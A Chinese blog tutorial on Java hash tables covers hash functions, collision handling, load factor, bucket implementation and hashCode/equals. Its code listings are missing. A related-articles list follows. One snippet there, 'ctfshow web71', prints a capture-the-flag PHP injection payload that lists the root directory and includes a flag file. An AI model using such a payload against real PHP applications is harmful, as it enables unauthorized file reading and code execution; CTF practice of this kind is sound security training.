Java基础数据结构之哈希表

概念

顺序结构以及平衡树 中,元素关键码与其存储位置之间没有对应的关系,因此在 查找一个元素时,必须要经过关键 码的多次比较 顺序查找时间复杂度为 O(N) ,平衡树中为树的高度,即 O( log2N ) ,搜索的效率取决于搜索过程中 元素的比较次数。
理想的搜索方法:可以 不经过任何比较,一次直接从表中得到要搜索的元素 如果构造一种存储结构,通过某种函 (hashFunc) 使元素的存储位置与它的关键码之间能够建立一一映射的关系,那么在查找时通过该函数可以很快 找到该元素
当向该结构之中插入元素时,根据该元素的关键码和特定的函数计算出该元素应存放的位置,并且按此位置存放,而在取元素时按同样方式计算出所处位置。这样的话,存储和查找的时间复杂度就可以达到O(1)。
该方式即为哈希(散列)方法,用到的函数称为哈希(散列)函数。构造出来的结构称为哈希表或散列表
哈希函数设置为: hash(key) = key % capacity ; capacity 为存储元素底层空间总的大小。
比如一个长度为10的数组
如果要放13,hash(13)=13%10=3所以放在3下标,但如果要放14,会出现什么问题?

冲突(碰撞)

1.概念:

对于两个数据元素的关键字 和 (i != j) ,有ki != kj ,但有: Hash(ki ) == Hash( kj) ,即: 不同关键字通过相同哈 希函数计算出相同的哈希地址,该种现象称为哈希冲突或哈希碰撞

2.冲突的发生是必然的,我们要做的就是降低冲突率

3.冲突的避免--哈希函数的设计

引起哈希冲突的一个原因可能是: 哈希函数设计不够合理
希函数设计原则
哈希函数的定义域必须包括需要存储的全部关键码,而如果散列表允许有 m 个地址时,其值域必须在 0 m-1 之间
哈希函数计算出来的地址能均匀分布在整个空间中
哈希函数应该比较简单

1.直接定制法(常用)

取关键字的某个线性函数为散列地址: Hash Key = A*Key + B。优点:简单均匀;缺点:需要事先知道关键字的分布情况;使用场景:适合于查找比较小且连续的情况。
例如:Hash(key)=key-minval;对于数据97,95,91,93,96,minval是91,所以将97放到6下标,95放到4下标……
2.除留余数法
散列表中允许的地址数是m(就是下标从0到m,注意哈希表的底层首先是一个数组),那么就取小于等于m,接近于m的质数p作为除数,用函数 hash(key) = key %p来求得地址
3. 平方取中法 --( 了解 )
假设关键字为 1234 ,对它平方就是 1522756 ,抽取中间的 3 227 作为哈希地址; 再比如关键字为 4321 ,对 、它平方就是18671041 ,抽取中间的 3 671( 710) 作为哈希地址 平方取中法比较适合:不知道关键字的分 布,而位数又不是很大的情况
4. 折叠法 --( 了解 )
折叠法是将关键字从左到右分割成位数相等的几部分( 最后一部分位数可以短些 ) ,然后将这几部分叠加求和, 并按散列表表长,取后几位作为散列地址。 折叠法适合事先不需要知道关键字的分布,适合关键字位数比较多的情况
5. 随机数法 --( 了解 )
选择一个随机函数,取关键字的随机函数值为它的哈希地址,即 H(key) = random(key), 其中 random 为随机数函数。 通常应用于关键字长度不等时采用此法
6. 数学分析法 --( 了解 )
设有 n d 位数,每一位可能有 r 种不同的符号,这 r 种不同的符号在各位上出现的频率不一定相同,可能在某些位上分布比较均匀,每种符号出现的机会均等,在某些位上分布不均匀只有某几种符号经常出现。可根据散列表的大小,选择其中各种符号分布均匀的若干位作为散列地址。
注意:哈希函数设计的越精妙,产生哈希冲突的可能性就越低,但是无法避免哈希冲突

4.冲突的避免--负载因子调节

散列表的载荷因子(负载因子)=填入表中的元素/散列表的长度

由于表长是定值,所以填入的元素越多,负载因子越大,产生冲突的可能性就越大。一般要将载荷因子控制在0.75以下,当超过0.75时,就应该对哈希表中的数组进行扩容

5.冲突的解决之闭散列

闭散列:也叫开放地址法,当发生哈希冲突时,如果哈希表未被装满,说明在哈希表中必然还有空位置,那么可以 key 存放到冲突位置中的 下一个 空位置中去。那么如何找到下一个空位置呢?
法一:线性探测
从发生冲突的位置开始,依次向后进行探测,直到找到下一个空位置。缺陷是产生冲突的元素会堆积在一块,例如:
想要插入11,21,31,41,就会依次放到2,3,8,0下标
法二:二次探测
找下一个空位置的方法为:Hi  = (H0+ i^2)% m, 或者: Hi= (H0-i^2 )% m。其中:H0是通过哈希函数计算出的下标, i = 1,2,3… ,表示的是发生冲突的次数,例如
想要放21,通过哈希函数计算出来是1,即H0=1,这是第一次发生冲突,所以i=1,所以 Hi= (H0+i^2 )% m即Hi=(1+1)%10=2。

6.冲突的解决之开散列(哈希桶)

开散列法又叫链地址法 ( 开链法 ) ,首先对关键码集合用散列函数计算散列地址,具有相同地址的关键码归于同一子 集合,每一个子集合称为一个桶,各个桶中的元素通过一个单链表链接起来,各链表的头结点存储在哈希表中。
比如要放11,通过散列函数计算出下标为1,所以可以通过头插法或者尾插法将11查到对应的链表里
这就是我们所说的哈希表实际上是数组+链表+红黑树(当数组长度>=64&&链表长度>=8以后,就会将其变成一棵红黑树)
java的HashMap就是用这种哈希表的方式来解决哈希冲突的

7.哈希桶的实现

首先注意,哈希桶是一个数组,数组的元素其实就是每个链表的头节点

放置元素:

首先要找到对应链表,然后遍历该链表,如果某个结点的key等于待插入结点的key,就更新该节点的value值,然后结束该方法即可;如果没有对应的key,就通过头插法或者尾插法插入该节点,代码如下:

但这样是有缺陷的,我们之前提到了负载因子最好不超过0.75,所以我们再加一个方法返回当前的负载因子,如果大于0.75就进行扩容,代码如下:

首先添加一个成员变量,即默认最大负载因子

然后是计算负载因子

最后是在put方法的最后进行扩容。

但这样的扩容不对!!!因为数组长度变了,对应的key所在的下标就会变!!!,所以代码应为(我用的头插法扩容):

获得value:

HashMap,HasSet的实现

1.Map不支持迭代器遍历,因为它没有实现Iterable接口,要想用迭代器,就必须将Map转化成Set

2.Map中的对象不需要必须可比较,因为他是通过Hash函数来计算所处位置,而不是通过大小比较。并且key或value可以是null,如下:

3.HashMap和HashSet一样是可以天然去重的,(TreeSet,TreeMap也一样)如下:

 
  

4.HashMap,HashSet对象不一定可比较,key也不一定是一个整数,那么系统是怎么找到对应的下标从而将键值对放进去的呢?这就用到了HashCode方法来生成一个整数。看源码:

当key不是null时,就会调用key的hashCode方法,如果key本身没有hashCode方法,就会调用Object类的方法:

这段话的意思是,在合理情况下,不同的对象会返回不同的整数,这通常是将对象的内部地址转换为整数实现的,所以下面的情况,即使Student的id是相同的,产生的hashCode也是不同的,如下

要想产生同样的整数,就可以重写hashCode方法:

这是我们根据上面的源码自己重写的方法,调用了hash方法,传参时直接传入id,但最好是通过编译器直接生成hashCode方法,同时一并重写equals方法

如果不重写equals方法,相同id的对象jinxingequals方法后产生的结果是false,因为源码中equals是根据对象的地址比较的

哈希桶的优化代码

我们将哈希桶写成一个泛型类,并让其可以通过各种类型的key生成对应的整数,代码如下:

1.放置键值对:

2.根据key得到对应的value

看下面的一段代码:

student1和student2的id是一样的,而且我们重写了hashCode方法,所以说,虽然我们只在哈希桶里面放置了student1,但在根据student2取元素时,得到的也应该是10,但结果却如下:

这是因为put函数和getval函数有一句是错的,即if(cur.key==key),应该用equals方法,代码如下:

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mfbz.cn/a/356382.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

【极数系列】Flink环境搭建Linux版本 (03)

文章目录 引言01 Linux部署JDK11版本1.下载Linux版本的JDK112.创建目录3.上传并解压4.配置环境变量5.刷新环境变量6.检查jdk安装是否成功 02 Linux部署Flink1.18.0版本1.下载Flink1.18.0版本包2.上传压缩包到服务器3.修改flink-config.yaml配置4.启动服务5.浏览器访问6.停止服务…

1002. HarmonyOS 开发问题:鸿蒙 OS 技术特性是什么?

1002. HarmonyOS 开发问题:鸿蒙 OS 技术特性是什么? 硬件互助,资源共享 分布式软总线 分布式软总线是多种终端设备的统一基座,为设备之间的互联互通提供了统一的分布式通信能力,能够快速发现并连接设备,高效地分发…

Redis 笔记四

概要: 1.高并发场景秒杀抢购超卖bug实战重现 2.阿里巴巴内部高并发秒杀下单方案首次揭秘 3.基于ReddisMQ实现秒杀下单架构 4.10万订单每秒热点数据架构优化实践 5.秒杀下单MQ如何保证不丢失消息 6.解决MQ下单消息重复消费幂等机制详解 7.线上MQ百万秒杀订单发生积压…

系统架构设计师教程(十九)大数据架构设计理论与实践

大数据架构设计理论与实践 19.1 传统数据处理系统存在的问题19.2 大数据处理系统架构分析19.2.1 大数据处理系统面临挑战19.2.2 大数据处理系统架构特征19.3 Lambda架构19.3.1 Lambda架构对大数据处理系统的理解19.3.2 Lambda架构应用场景19.3.3 Lambda架构介绍19.3.4 Lambda架…

ctfshow web71

开启环境&#xff1a; c?><?php $anew DirectoryIterator("glob:///*"); foreach($a as $f) {echo($f->__toString(). );} exit(0); ?> cinclude("/flagc.txt");exit();

解决方案—幻兽帕鲁Palworld私服部署 一杯茶的功夫搭建部署一个属于自己的游戏私服

《幻兽帕鲁》是Pocketpair开发的一款开放世界生存制作游戏 &#xff0c;游戏于2024年1月18日发行抢先体验版本&#xff0c;游戏中&#xff0c;玩家可以在广阔的世界中收集神奇的生物“帕鲁”&#xff0c;派他们进行战斗、建造、做农活&#xff0c;工业生产&#xff0c;游戏目前…

2024年10大软件开发趋势

随着 2024 年的到来&#xff0c;技术进步和不断变化的市场需求正在推动软件开发领域继续呈指数级增长。对于组织和工程师来说&#xff0c;及时了解这些模式不仅有用&#xff0c;而且是保持残酷和有效的基础。在本文中&#xff0c;我们研究了预计将在 2024 年产生巨大影响的关键…

韶关一高层住宅突发火灾 富维烟火识别防止悲剧发生

近日&#xff0c;韶关市一高层住宅楼突发火灾&#xff0c;幸亏及时得到控制&#xff0c;未造成重大伤亡。这一事件再次提醒我们&#xff0c;高层建筑的火灾安全不容忽视。针对这一问题&#xff0c;北京富维图像公司的FIS智能图像识别系统显得尤为重要。 FIS系统利用已部署的监控…

Java多线程--线程的安全问题与线程的同步机制介绍

文章目录 一、线程安全问题&#xff08;1&#xff09;介绍&#xff08;2&#xff09;同一个资源问题和线程安全问题1、方式一&#xff1a;实现Runnable接口1.1 票数问题1.2 重票和错票问题 2、方式二&#xff1a;继承Thread类 二、安全问题分类总结&#xff08;1&#xff09;局…

如何使用宝塔面板搭建MySQL 5.5数据库并实现公网远程连接

文章目录 前言1.Mysql服务安装2.创建数据库3.安装cpolar3.2 创建HTTP隧道 4.远程连接5.固定TCP地址5.1 保留一个固定的公网TCP端口地址5.2 配置固定公网TCP端口地址 前言 宝塔面板的简易操作性,使得运维难度降低,简化了Linux命令行进行繁琐的配置,下面简单几步,通过宝塔面板cp…

当包容结构体遇见灵活的内存管理

&#x1f308;个人主页&#xff1a;小田爱学编程 &#x1f525; 系列专栏&#xff1a;c语言从基础到进阶 &#x1f3c6;&#x1f3c6;关注博主&#xff0c;随时获取更多关于c语言的优质内容&#xff01;&#x1f3c6;&#x1f3c6; &#x1f600;欢迎来到小田代码世界~ &#x…

MVCC原理讲解(深入浅出)

目录 一、什么是MVCC 二、当前读、快照读都是什么鬼 三、当前读 四、快照读 五、数据库的并发场景 六、MVCC解决并发的哪些问题 1.解决问题如下&#xff1a; 七、MVCC的实现原理 1.版本链 八、undo日志 1.undo log 的用途 2.undo log主要分为两种 九、Read View…

HCIP寒假第8次作业

第一步把ipv4网络配通 [r1]int g0/0/0 [r1-GigabitEthernet0/0/0]ip add 12.1.1.1 24 [r1-GigabitEthernet0/0/0]int l0 [r1-LoopBack0]ip add 1.1.1.1 32 [r1]ospf 1 router-id 1.1.1.1 [r1-ospf-1]area 0 [r1-ospf-1-area-0.0.0.0]network 0.0.0.0 255.255.255.255[r2]int g…

Linux使用匿名管道实现进程池得以高效通信

&#x1f3ac;慕斯主页&#xff1a;修仙—别有洞天 ♈️今日夜电波&#xff1a;Nonsense—Sabrina Carpenter 0:50━━━━━━️&#x1f49f;──────── 2:43 &#x1f504; ◀️ ⏸ ▶️ …

Unity 外观模式(实例详解)

文章目录 示例1&#xff1a;初始化游戏场景中的多个子系统示例2&#xff1a;管理音频播放示例3&#xff1a;场景加载流程示例4&#xff1a;UI管理器示例5&#xff1a;网络服务通信 在Unity中使用外观模式&#xff08;Facade&#xff09;时&#xff0c;主要目的是为了简化复杂子…

Android创建工程

语言选择Java&#xff0c;我用的Java 最小SDK&#xff1a;就是开发的APP支持的最小安卓版本 Gradle 是一款Google 推出的基于 JVM、通用灵活的项目构建工具&#xff0c;支持 Maven&#xff0c;JCenter 多种第三方仓库;支持传递性依赖管理、废弃了繁杂的xml 文件&#xff0c;转而…

如何快速掌握DDT数据驱动测试?

前言 网盗概念相同的测试脚本使用不同的测试数据来执行&#xff0c;测试数据和测试行为完全分离&#xff0c; 这样的测试脚本设计模式称为数据驱动。(网盗结束)当我们测试某个网站的登录功能时&#xff0c;我们往往会使用不同的用户名和密码来验证登录模块对系统的影响&#x…

2023年:个人年度成长与团队协作成就

文章目录 个人职业发展的喜悦团队成就的辉煌公众号CSDN申请了移动安全领域新星创作者获得6月城市之星北京TOP 10获得23年博客之星TOP 41年度总结 知识星球 开拓新领域的决心免费知识大陆付费知识大陆 展望未来福利时间知识星球会员一年知识星球立减88券 在这个充满挑战与机遇的…

Linux 挂载读取、卸载 ntfs格式硬盘

windows常用的ntfs硬盘分区格式&#xff0c;在linux通常不能直接读取&#xff0c;不过挂载也是非常容易 一、挂载ntfs分区 1.安装 apt-get install ntfs-3g2.查看现在接上的硬盘 fdisk -l可以找到类似如下的&#xff0c;会显示microsoft basic data 3.创建挂载的目录 创…

全能相似度计算与语义匹配搜索工具包,多维度实现多种算法,涵盖文本、图像等领域。支持文图搜索,满足您在不同场景下的搜索需求

全能相似度计算与语义匹配搜索工具包,多维度实现多种算法,涵盖文本、图像等领域。支持文图搜索,满足您在不同场景下的搜索需求。 Similarities:精准相似度计算与语义匹配搜索工具包,多维度实现多种算法,覆盖文本、图像等领域,支持文搜、图搜文、图搜图匹配搜索 Similar…
最新文章